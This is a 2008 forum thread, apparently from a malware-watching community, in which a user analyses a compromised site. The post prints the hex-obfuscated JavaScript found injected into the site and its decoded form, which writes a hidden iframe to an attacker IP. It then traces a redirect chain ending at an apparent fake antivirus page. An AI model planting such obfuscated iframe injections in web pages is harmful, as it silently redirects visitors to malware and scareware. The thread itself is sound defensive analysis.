Author Topic: hiphophoney.com  (Read 3428 times)

0 Members and 1 Guest are viewing this topic.

July 29, 2008, 05:24:00 pm
Read 3428 times

Kayrac

  • Guest
stole this from my writeup at dslreports

Okay so, DO NOT VISIT ANY OF THESE LINKS, even though it appears the final link is already dead

From hiphophoney.com is injected with

Code: [Select]
<!--
var d=document,kol=561;
function O10H488F179292A39(H488F179293234){  return( parseInt(H488F179293234,16));}function H488F179294A5B(H488F17929522C){  var H488F179295A20='';for(H488F17929621B=0; H488F17929621B<H488F17929522C.length; H488F17929621B+=2){ H488F179295A20 += ( String.fromCharCode (O10H488F179292A39(H488F17929522C.substr(H488F17929621B, 2))));}return H488F179295A20;} document.write(H488F179294A5B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3233343234292B273663385C272077696474683D3631206865696768743D333834207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->

which translates into

Code: [Select]
<script>if(!myia){d.write('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*23424)+'6c8\' width=61 height=384 style=\'display: none\'></IFRAME >');}var myia=true;</script>

this takes you to,
Code: [Select]
http://77.221.133.171/.if/go.html?
which is a fake 403 forbidden page
which has this

Code: [Select]
<iframe style="position: absolute; top: 10; left: 124; width: 546px; height: 524px; visibility: hidden" frameborder="0" scrolling="no" src="http://77.221.133.171/.dif/go.php?sid=1"></iframe>

SO, we visit that, and it moves up quickly along to

Code: [Select]
http://77.221.133.171/.sp/check.cgi?o

which quickly switches into

Code: [Select]
http://www.advancedxpdefender.com/sysscan/7805dd4cf47ceee6ef4b9c4f78061493/1/

which is already dead, but it looks like a fake antivirus

:)

July 30, 2008, 12:56:20 pm
Reply #1

sowhat-x

  • Guest
Might have been temporarily "offline"...spotted somewhere back in middle June:
http://www.malwaredomainlist.com/mdl.php?search=77.221.133.171&colsearch=All&quantity=50